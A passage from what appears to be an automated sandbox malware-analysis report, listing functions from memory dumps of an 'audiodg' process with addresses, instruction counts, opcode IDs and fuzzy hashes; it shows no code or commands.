Instruction ID: f842ba86f1e7f356d8130a2991f58b7e3c900c20b0150e7dfa3f14e8b7695c2d
Opcode Fuzzy Hash: b7c7b3903d7c9eebae29ee6faf654ec3433551b3703b546c4fea7b37f3f791ad
Instruction Fuzzy Hash: BD812623D0E5E29EE211777C78151F92BA0FFD23A5F0801B7D4888A0D7DA2C5C4A8399

Function 00007FF848F116D8 Relevance: .3, Instructions: 281COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000016.00000002.2196453331.00007FF848F10000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF848F10000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_22_2_7ff848f10000_audiodg.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: e644703b3df9ca72c8dc147dba20c1358e0e70d966be211ebae7bda832ea442b
Instruction ID: 9d47db5b7477f55cc50459841814894283a13701d35ce8f247822db9afa3596b
Opcode Fuzzy Hash: e644703b3df9ca72c8dc147dba20c1358e0e70d966be211ebae7bda832ea442b
Instruction Fuzzy Hash: 9881AD31A1CA4A8FDB59EF1C88656B977E2FF98740F14057AE44DC32C6CF24AC428785

Function 00007FF848F10640 Relevance: .3, Instructions: 273COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000016.00000002.2196453331.00007FF848F10000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF848F10000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_22_2_7ff848f10000_audiodg.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 5639860d242a8c79f030830f3395f28048b1f8e64e843f06a62156bd78e902c2
Instruction ID: e12b4ed427cd5e5359c1e9f346300e734fbcf5dba73890fbe2218ca44a26422d
Opcode Fuzzy Hash: 5639860d242a8c79f030830f3395f28048b1f8e64e843f06a62156bd78e902c2
Instruction Fuzzy Hash: C071E523D0E5E28EE255777C78161F92BA0FFD27A4F0805B7D4888A0D7DE2C5C4A8399

Function 00007FF848F1C5A9 Relevance: .2, Instructions: 193COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000016.00000002.2196453331.00007FF848F17000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF848F17000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_22_2_7ff848f17000_audiodg.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 3634b92ac638643d40548d0f23230f3940eb11fe400c255405860c619e1b55cb
Instruction ID: 607fd5b30566def7967b455a6c8211c8459f20143ab35ea56cf7934f2ead04f2
Opcode Fuzzy Hash: 3634b92ac638643d40548d0f23230f3940eb11fe400c255405860c619e1b55cb
Instruction Fuzzy Hash: 22611570E1C61E8FEB94EBA884556EDBBB1EF59340F50117AD00DE7282EF786C448B58

Function 00007FF848F11D2D Relevance: .2, Instructions: 186COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000016.00000002.2196453331.00007FF848F10000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF848F10000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_22_2_7ff848f10000_audiodg.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: e7c2f5b8367e03d353a7c49a194a971480ee3766f41261ce2154d207a55fba5b
Instruction ID: 08e05f6918b1cead9a694319facf2336c3f7316130eaf01ccf0311b7ee88575f
Opcode Fuzzy Hash: e7c2f5b8367e03d353a7c49a194a971480ee3766f41261ce2154d207a55fba5b
Instruction Fuzzy Hash: 8951CF31A1CA9A8FDB48EF1888645BA77E2FB98740F14457ED44AC7282CF34EC42C785

Function 00007FF848F2569D Relevance: .2, Instructions: 156COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000016.00000002.2196453331.00007FF848F24000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF848F24000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_22_2_7ff848f24000_audiodg.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 365734b769ab86da0afc7051c30fc43c7548c4231d5dde2150dc736cc2275068
Instruction ID: ded15ad70f2f77122bcf88b7033e40b5d3e86eae23b1233133dcbbad97dcdb29
Opcode Fuzzy Hash: 365734b769ab86da0afc7051c30fc43c7548c4231d5dde2150dc736cc2275068
Instruction Fuzzy Hash: 0D513E70D1895D8FEF94EB68D859AADBBF1FF28341F10016AD00DE3692DB35A881CB40

Function 00007FF848F13165 Relevance: .1, Instructions: 143COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000016.00000002.2196453331.00007FF848F10000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF848F10000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_22_2_7ff848f10000_audiodg.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 2cb0cf37696236287aaac5005106559e171efbe4bcb2c27228c212b2a6dedce3
Instruction ID: 4417f44123fa0b9f29442e3a896cc66c533842ba3eddecc016b70ed9ca7ec95f
Opcode Fuzzy Hash: 2cb0cf37696236287aaac5005106559e171efbe4bcb2c27228c212b2a6dedce3
Instruction Fuzzy Hash: 52513530D0850D8EEB94EBA8C4596EDBBB1FF58341F50017AD009E72D1DF386D458B58

Function 00007FF848F12145 Relevance: .1, Instructions: 141COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000016.00000002.2196453331.00007FF848F10000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF848F10000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_22_2_7ff848f10000_audiodg.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 31236eeffa7854729e10d8f403c773c85dce58d91040198ebd2da20d5a4fd03a
Instruction ID: a970f4453c221b64b004dee4da330edf9601145d76bf00aab225a76bafb71efe
Opcode Fuzzy Hash: 31236eeffa7854729e10d8f403c773c85dce58d91040198ebd2da20d5a4fd03a
Instruction Fuzzy Hash: E8412A31E1D68A4FE385E7B898551B8BBE0EF8A390F0505BBD44CC71D2DF28AC418355

Function 00007FF848F1B33D Relevance: .1, Instructions: 125COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000016.00000002.2196453331.00007FF848F17000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF848F17000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_22_2_7ff848f17000_audiodg.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 0dbc1f137a7205a4d877ccabe6109a8e28281dd1e9fc4d3691e284a403b80bf0
Instruction ID: e15cc89f2cdb28b74c9cc10f6eb79ea16576e88bb5cfd03035cc84a91e03e414
Opcode Fuzzy Hash: 0dbc1f137a7205a4d877ccabe6109a8e28281dd1e9fc4d3691e284a403b80bf0
Instruction Fuzzy Hash: FD41AB71E2C94ADEE742FB6898496B9BBE0FF59351F0844B6D40CC60D2EF28A8558354

Function 00007FF848F27A45 Relevance: .1, Instructions: 119COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000016.00000002.2196453331.00007FF848F24000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF848F24000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_22_2_7ff848f24000_audiodg.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 971725a1bb9cc82a7190132c7acad634a377c0a00bc4346d007edba6b65200d3
Instruction ID: fa5f3ca4c30933514d88d4349eaae59f39610d2e2046d3258454e0b5439963f5
Opcode Fuzzy Hash: 971725a1bb9cc82a7190132c7acad634a377c0a00bc4346d007edba6b65200d3
Instruction Fuzzy Hash: 9B411670D0861A8FEB54EFA4E4947FCBAF0EF58350F14057AD009E62D1DB39A984CB59

Function 00007FF848F1C69D Relevance: .1, Instructions: 98COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000016.00000002.2196453331.00007FF848F17000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF848F17000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_22_2_7ff848f17000_audiodg.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: f8d19ce755d0b79063403bb3ccfdff1b66e108bc9a89b5aec0f89362ddcc6130
Instruction ID: 31a1816d79cf5d8aaa09bb666768e12a682fe7c4ddcf07c7be1138e829584301
Opcode Fuzzy Hash: f8d19ce755d0b79063403bb3ccfdff1b66e108bc9a89b5aec0f89362ddcc6130
Instruction Fuzzy Hash: C631C630E1C91D8FEB94FBA894956ADBBB1FF69340F501179D00DE7282DF646C418B44

Function 00007FF848F10805 Relevance: .1, Instructions: 91COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000016.00000002.2196453331.00007FF848F10000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF848F10000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_22_2_7ff848f10000_audiodg.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 642d3465f1232c166659f27dcdd8758f26408115d73d45da1d593762c8f21285
Instruction ID: 9b59a2b7c48762c347dfc1bc6bc65970f1c6c7b1b9379034dcac8c24fd0defcf
Opcode Fuzzy Hash: 642d3465f1232c166659f27dcdd8758f26408115d73d45da1d593762c8f21285
Instruction Fuzzy Hash: FF21377290D6969FE345B77CA8592E97BD0FF413A8F080177D448CD083EF189456C395

Function 00007FF848F1CD68 Relevance: .1, Instructions: 87COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000016.00000002.2196453331.00007FF848F17000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF848F17000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_22_2_7ff848f17000_audiodg.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 6e2f57fa5301f2515292563948490d8e33010c73c1747980040ccc26814c760a
Instruction ID: 8500562fa428c230b31e02df34b9fae97962006fac8ecbc88116ab9ae96247ae
Opcode Fuzzy Hash: 6e2f57fa5301f2515292563948490d8e33010c73c1747980040ccc26814c760a
Instruction Fuzzy Hash: D721C337A1D526AADB507B6CF8414EA7760FF843B5B100237D60DCA0C2EB15B80987E8

Function 00007FF848F13294 Relevance: .1, Instructions: 78COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000016.00000002.2196453331.00007FF848F10000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF848F10000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_22_2_7ff848f10000_audiodg.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 3c4ef87d0eb18aaafc230f03190338d099d44c69c70d09af55d7165c4ca4d4fb
Instruction ID: bcb9c173b2935c1bd957bbe2ced49922fefce64f1dfeda655036968faecee33d
Opcode Fuzzy Hash: 3c4ef87d0eb18aaafc230f03190338d099d44c69c70d09af55d7165c4ca4d4fb
Instruction Fuzzy Hash: 2B21E070E0851D8FEB94EB98C494AECBBF1FB58341F10017AD00AE72D5DB396840CB18

Function 00007FF848F1A9B1 Relevance: .1, Instructions: 75COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000016.00000002.2196453331.00007FF848F17000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF848F17000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_22_2_7ff848f17000_audiodg.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: a158afa3c7c3dd027495ffd000b02e40de28674604ae28a31f39b9f0e2eacb31
Instruction ID: 67e188c794645471c113f738723432e69010fb9e514e622e45247f2c7a9ed8a5
Opcode Fuzzy Hash: a158afa3c7c3dd027495ffd000b02e40de28674604ae28a31f39b9f0e2eacb31
Instruction Fuzzy Hash: CF21517091864DCFDB45EF18C4596BD7BF0FF68345F05456AE809D7291DB34A850CB40

Function 00007FF848F13354 Relevance: .1, Instructions: 73COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000016.00000002.2196453331.00007FF848F10000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF848F10000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_22_2_7ff848f10000_audiodg.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: c81b7de32962a5c98f2c044af54a0b8b5646a4777b86d91e724947e8f4480ae5
Instruction ID: 8716511402db7d0fe06ca6a002ee3a8397d58f55eaf4dde044fc863a827684a5
Opcode Fuzzy Hash: c81b7de32962a5c98f2c044af54a0b8b5646a4777b86d91e724947e8f4480ae5
Instruction Fuzzy Hash: 0621903184D78A8FE742EB7888585E97FF4EF5B301F0905EBD089C70A2DA2D994AC751

Function 00007FF848F27121 Relevance: .1, Instructions: 70COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000016.00000002.2196453331.00007FF848F24000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF848F24000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_22_2_7ff848f24000_audiodg.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: aa9254fe5b0a196a51b12edcbf9709b04d8eec53d6cb0c7d1ae5bf0c2679d3b5
Instruction ID: 125e82d99b1b028537c9c5b4ed23fbdb95051b6ff310f3d31e64348016b5f592
Opcode Fuzzy Hash: aa9254fe5b0a196a51b12edcbf9709b04d8eec53d6cb0c7d1ae5bf0c2679d3b5
Instruction Fuzzy Hash: F5117F70D0CA5E9FEB98EF68945A2BA7BA0FF58341F0005BAD409C61D2DF3AA544CB41

Function 00007FF848F27265 Relevance: .1, Instructions: 68COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000016.00000002.2196453331.00007FF848F24000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF848F24000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_22_2_7ff848f24000_audiodg.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 046baef20d08ab99825b58c63020a5b71a864fb0d70541d7326150ccb87d9cf0
Instruction ID: 9ab0ac14d0140f901df8f2847de7016e110163a83f2d76f1224d7f5259ffb7d3
Opcode Fuzzy Hash: 046baef20d08ab99825b58c63020a5b71a864fb0d70541d7326150ccb87d9cf0
Instruction Fuzzy Hash: 2E11E931C0D94A8FEB59EB64945A2B87BE1FF66341F0400BEE00DC65D2DF2A6444CB25

Function 00007FF848F24BF5 Relevance: .1, Instructions: 68COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000016.00000002.2196453331.00007FF848F24000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF848F24000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_22_2_7ff848f24000_audiodg.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 6516cbf57c9c6f67ad12af3957115225f814c32b3cbc0d0335ffa9e3f3c9e846
Instruction ID: 676f087de8e85e4aa706d6e1718fab3d6a1f64c9af40366bbeff508f0b2680dd
Opcode Fuzzy Hash: 6516cbf57c9c6f67ad12af3957115225f814c32b3cbc0d0335ffa9e3f3c9e846
Instruction Fuzzy Hash: 3C119A30C0DA4E9FEB89EF6894592B97BA0FF68341F0405BAD419C31D2DB79A480CB41

Function 00007FF848F271C5 Relevance: .1, Instructions: 67COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000016.00000002.2196453331.00007FF848F24000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF848F24000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_22_2_7ff848f24000_audiodg.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 7f25794f5fc23af107e4cb71b92aca05a07b3858351e351fd08650526a0e0c60
Instruction ID: 3703783788a49ac224ea4fd88bb4e4524cd85b50815f94abe0b0d416bedd73b0
Opcode Fuzzy Hash: 7f25794f5fc23af107e4cb71b92aca05a07b3858351e351fd08650526a0e0c60
Instruction Fuzzy Hash: 0A11AC3080CA4E9FEB99EF6884592B97BE1FF69341F0005BEE419C71D2DB39A540CB50

Function 00007FF848F22AE8 Relevance: .1, Instructions: 67COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000016.00000002.2196453331.00007FF848F21000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF848F21000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_22_2_7ff848f21000_audiodg.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: dda7d6c88668ac6e41217295ed7a8efd7776789eaf4e539eaf6c0447633ef11c
Instruction ID: ed51416534ae29bf266c55be4b6100c3a5cd903a6d1de88468b910b07a8546eb
Opcode Fuzzy Hash: dda7d6c88668ac6e41217295ed7a8efd7776789eaf4e539eaf6c0447633ef11c
Instruction Fuzzy Hash: 9311AC3084D7894FEB07BB6098291B9BBA0EF16304F0604FBD00ACB4E3DB3A6945C765

Function 00007FF848F25095 Relevance: .1, Instructions: 65COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000016.00000002.2196453331.00007FF848F24000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF848F24000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_22_2_7ff848f24000_audiodg.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 96aacccf16d629f55b4c155ebdb842e2b212db148402bdff72f018b40c1edb58
Instruction ID: 31a717a51028e77ce07faa8eb125f9a5b5f86d02e51e8a0f93ca9f2b920d8305
Opcode Fuzzy Hash: 96aacccf16d629f55b4c155ebdb842e2b212db148402bdff72f018b40c1edb58
Instruction Fuzzy Hash: 0C112731D0DA8A8FE799EB64A8662B87B90FF19300F0400BED00DC30D2DB2A6444C341

Function 00007FF848F228E1 Relevance: .1, Instructions: 65COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000016.00000002.2196453331.00007FF848F21000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF848F21000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_22_2_7ff848f21000_audiodg.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 8d379c4ade9462515976f2b8da206f339595eb5fe3869059350c7952fe62a017
Instruction ID: 7b8b5ac577ae0aaac2ee8764dfd445458e01f35ae63362ed1d0944f3ad7e1d0e
Opcode Fuzzy Hash: 8d379c4ade9462515976f2b8da206f339595eb5fe3869059350c7952fe62a017
Instruction Fuzzy Hash: E011BB7090C6498FDB48EF28D8962E9BBE0FF58350F1106BEE80AC32C1CB35A440CB85

Function 00007FF848F24B59 Relevance: .1, Instructions: 62COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000016.00000002.2196453331.00007FF848F24000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF848F24000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_22_2_7ff848f24000_audiodg.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 6d821deb6c4795c4476250635fffb9c51c7409ca2c1fb957fb2840465b6eecb6
Instruction ID: 30b44a53ac0d9c580c805830594e7b62fcd36cde5878b8103f798f96395b88f5
Opcode Fuzzy Hash: 6d821deb6c4795c4476250635fffb9c51c7409ca2c1fb957fb2840465b6eecb6
Instruction Fuzzy Hash: EF218C3090DA8A9FEB89FF6884692B97BA0FF69341F0405BAD409C65D2DB79A440C741

Function 00007FF848F1CE60 Relevance: .1, Instructions: 62COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000016.00000002.2196453331.00007FF848F17000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF848F17000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_22_2_7ff848f17000_audiodg.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 32dcd020b5106aa8a441c9397f1713bc4a3ecb71667c40b0b71d213e4517ed16
Instruction ID: 8bbf6204287bc914f629e92a41d1e0d727985e4cb9abb9aca43762b110b407f4
Opcode Fuzzy Hash: 32dcd020b5106aa8a441c9397f1713bc4a3ecb71667c40b0b71d213e4517ed16
Instruction Fuzzy Hash: 0E119E3080DA9E8FEB86FB3894582B97BB0FF1A341F0404BAE409C71D2EB746940C754

Function 00007FF848F1CDD7 Relevance: .1, Instructions: 61COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000016.00000002.2196453331.00007FF848F17000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF848F17000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_22_2_7ff848f17000_audiodg.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 01c10c142e1a7e2bcb6e0d3251b613a0f80dd25a9b96e4145c5fdc3d2ad59ac2
Instruction ID: cd14d6b3a76915dd2d8b3514cb48e5bcfb7b4ed88d480f372091e0f53e7eb9cf
Opcode Fuzzy Hash: 01c10c142e1a7e2bcb6e0d3251b613a0f80dd25a9b96e4145c5fdc3d2ad59ac2
Instruction Fuzzy Hash: 4511A33190D79A8EEB56BF6898141FA7BB0FF06751F04057BE948C71D2EB345814C794

Function 00007FF848F22CD1 Relevance: .1, Instructions: 59COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000016.00000002.2196453331.00007FF848F21000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF848F21000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_22_2_7ff848f21000_audiodg.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 29fce85cecbbb229969aed0415bbed2e8917db10e058e0e2eac79d0be9444525
Instruction ID: 107ff94525d6cdab82e54a2cba8b30eee9d5684d108f3a79aa4a9e01d87854db
Opcode Fuzzy Hash: 29fce85cecbbb229969aed0415bbed2e8917db10e058e0e2eac79d0be9444525
Instruction Fuzzy Hash: EB016D3080D55E9EEB82FBB8988C6F9BBE0FF59341F0409B6D418C7092EB79A5458744

Function 00007FF848F272FD Relevance: .1, Instructions: 58COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000016.00000002.2196453331.00007FF848F24000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF848F24000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_22_2_7ff848f24000_audiodg.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 033a02d5bb28d59d3edab57596c9ca0e96b26fdf3ed62e0450db917031857e9c
Instruction ID: e5e8f1b2b5676cceda97d63647c4f38a5170315a4a67af672c586c09151de467
Opcode Fuzzy Hash: 033a02d5bb28d59d3edab57596c9ca0e96b26fdf3ed62e0450db917031857e9c
Instruction Fuzzy Hash: CD11C13090DA4E8FEB59FF2494592BA7BA0FF59340F0441BAD809C61D2DB3AA8548745

Function 00007FF848F25409 Relevance: .1, Instructions: 58COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000016.00000002.2196453331.00007FF848F24000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF848F24000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_22_2_7ff848f24000_audiodg.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: fd5fc70e1c4cbb5c9c85107014de74eea4026fd7b53f3462644a36de830eb91e
Instruction ID: a8dbbfcee180cbf17866a387401eb59ad125115a1bba9faccf0990396f77d332
Opcode Fuzzy Hash: fd5fc70e1c4cbb5c9c85107014de74eea4026fd7b53f3462644a36de830eb91e
Instruction Fuzzy Hash: D711BF30C0D68A9FEB89EB2888692B9BBF0FF19302F0405BFC419C61D2DB396554C701

Function 00007FF848F251BD Relevance: .1, Instructions: 58COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000016.00000002.2196453331.00007FF848F24000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF848F24000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_22_2_7ff848f24000_audiodg.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: e675dbf243765f92c643f9ec9b9ca4276cb0022c275023061ebb7860d3f70fd0
Instruction ID: d80b0ee3ef320a65a55f261db2eeb12ba8d91a5aa2285817365363aa730a1649
Opcode Fuzzy Hash: e675dbf243765f92c643f9ec9b9ca4276cb0022c275023061ebb7860d3f70fd0
Instruction Fuzzy Hash: 55119E70C0D64E8FEB89EB64D4592BEBBA0FF29341F0405BAD41AD71D2DB3AA544C711

Function 00007FF848F134E1 Relevance: .1, Instructions: 57COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000016.00000002.2196453331.00007FF848F10000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF848F10000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_22_2_7ff848f10000_audiodg.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 6750ae2a28394bd045381b6ab3fbd3f0459eeeec0f797be8f0069b5e7935bb85
Instruction ID: f50d61e7886c3a414352f7edc936ab2bb4d51ac87a8a69a72ab804299b3eb8de
Opcode Fuzzy Hash: 6750ae2a28394bd045381b6ab3fbd3f0459eeeec0f797be8f0069b5e7935bb85
Instruction Fuzzy Hash: 5B113C7090868E8FDB49EB6888596BA7BA0FF18741F0408BED45AC61D1DB39A944C704

Function 00007FF848F264A9 Relevance: .1, Instructions: 57COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000016.00000002.2196453331.00007FF848F24000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF848F24000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_22_2_7ff848f24000_audiodg.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 8113b28dffd855676553c9f6a5d96ccfed1820560cc6aa8def3c045c63925fea
Instruction ID: b419ff9320f0d5213374efc1747ff7d2fb8077211aa4a6dc041ca5003ba98a99
Opcode Fuzzy Hash: 8113b28dffd855676553c9f6a5d96ccfed1820560cc6aa8def3c045c63925fea
Instruction Fuzzy Hash: 01118830D0D68A8EE782FB6898592B97BF0FF1A340F0405B6D448C70A6EB28A4948745

Function 00007FF848F27851 Relevance: .1, Instructions: 56COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000016.00000002.2196453331.00007FF848F24000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF848F24000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_22_2_7ff848f24000_audiodg.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 2a601a1d3bc3b0b02e01efba8c85447f4c9cfcb8ce200bdef9c614807caf1d69
Instruction ID: 31c51418169697c94f7f9bfa471001aa114bf5f88c2d8bf40c73c1836930e4c4
Opcode Fuzzy Hash: 2a601a1d3bc3b0b02e01efba8c85447f4c9cfcb8ce200bdef9c614807caf1d69
Instruction Fuzzy Hash: 25115B3090D94A9FE741FB68D8896EA7BF4FF19341F2408B6D409C7191EB38A184C755

Function 00007FF848F2537D Relevance: .1, Instructions: 56COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000016.00000002.2196453331.00007FF848F24000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF848F24000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_22_2_7ff848f24000_audiodg.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 38dd22d47cc30477722b86224fe8a3235c0cc42e0e12af415b7d2d5fd20c2272
Instruction ID: 304d9d14dafd9bf47d2f42403ec1e2bc0f9e700c4a634a6b87abcc717df7a300
Opcode Fuzzy Hash: 38dd22d47cc30477722b86224fe8a3235c0cc42e0e12af415b7d2d5fd20c2272
Instruction Fuzzy Hash: 57119E3180DA8A8FEB89EB6884596B97BE1FF18341F0414BAD41AC61D2DF7AA950C701

Function 00007FF848F24EE5 Relevance: .1, Instructions: 56COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000016.00000002.2196453331.00007FF848F24000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF848F24000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_22_2_7ff848f24000_audiodg.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: a86167623457136de4b92ff0b1fe40e087bcc2b4cccde1633229050c91e4706d
Instruction ID: 82062cc870521dbc1455b03ca9a4e00f7cecf570c017674269dced4e02d71e7d
Opcode Fuzzy Hash: a86167623457136de4b92ff0b1fe40e087bcc2b4cccde1633229050c91e4706d
Instruction Fuzzy Hash: 8811CE31D0D69A9FEB91FB68985D6B97BE0FF69340F0404B6C81CC70E2EB38A4808701

Function 00007FF848F212B1 Relevance: .1, Instructions: 56COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000016.00000002.2196453331.00007FF848F21000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF848F21000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_22_2_7ff848f21000_audiodg.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: b166bae4f144a6aeb73edcc7c88ed4d1960e722401157750aa3dc5d907b3c31f
Instruction ID: 43163e6d24a7ec6ee24b20854ef554fd36ff95c038ec6cbead82cc2708bc1dc6
Opcode Fuzzy Hash: b166bae4f144a6aeb73edcc7c88ed4d1960e722401157750aa3dc5d907b3c31f
Instruction Fuzzy Hash: 17118B3090C64E8FEB84EF6884692B97BE0FF28341F4004BAE41AD21D1EB35A590C744

Function 00007FF848F12E7A Relevance: .1, Instructions: 55COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000016.00000002.2196453331.00007FF848F10000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF848F10000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_22_2_7ff848f10000_audiodg.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 5380448864d5d7b59b36dc196a01ab45b6e7926b9b5f24dda368916ee8135c66
Instruction ID: c93e0e5106c3658f55dbabb769d59835bab7bc031dd561566e704ce471e32eb9
Opcode Fuzzy Hash: 5380448864d5d7b59b36dc196a01ab45b6e7926b9b5f24dda368916ee8135c66
